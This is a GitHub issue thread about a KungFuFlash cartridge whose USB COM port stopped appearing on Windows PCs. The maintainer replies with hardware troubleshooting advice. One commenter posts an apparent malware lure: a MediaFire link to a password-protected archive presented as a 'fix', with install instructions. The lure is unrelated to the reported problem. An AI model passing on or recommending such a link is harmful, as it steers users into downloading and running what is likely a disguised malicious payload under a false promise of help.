### ISSUE TITLE
Communication error with PC

### ISSUE THREAD

**Issue by Dimension1471** [KimJorgensen/KungFuFlash#200]
When I connect the USB cable to the PC, the COM port does not appear.
I have tried several PCs with Windows 7 and 10 and with different USB cables.

At first everything worked fine (a couple of months).

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dimension1471** [comment]
Help me please. I want to continue using my "Kung fu flash" with my commodore 128

**Comment by KimJorgensen** [comment]
The USB port is only active under certain conditions, as described in the [readme](https://github.com/KimJorgensen/KungFuFlash?tab=readme-ov-file#usb-port) but I assume you know this since you had it working before.

From your description, it sounds like there is a problem with the Kung Fu Flash cartridge itself. If you have access to another cartridge you could try to test with that.
If you purchased the cartridge you should contact the seller for support. Did you build your own cartridge, I would check the solder joints with a microscope especially at the USB socket.
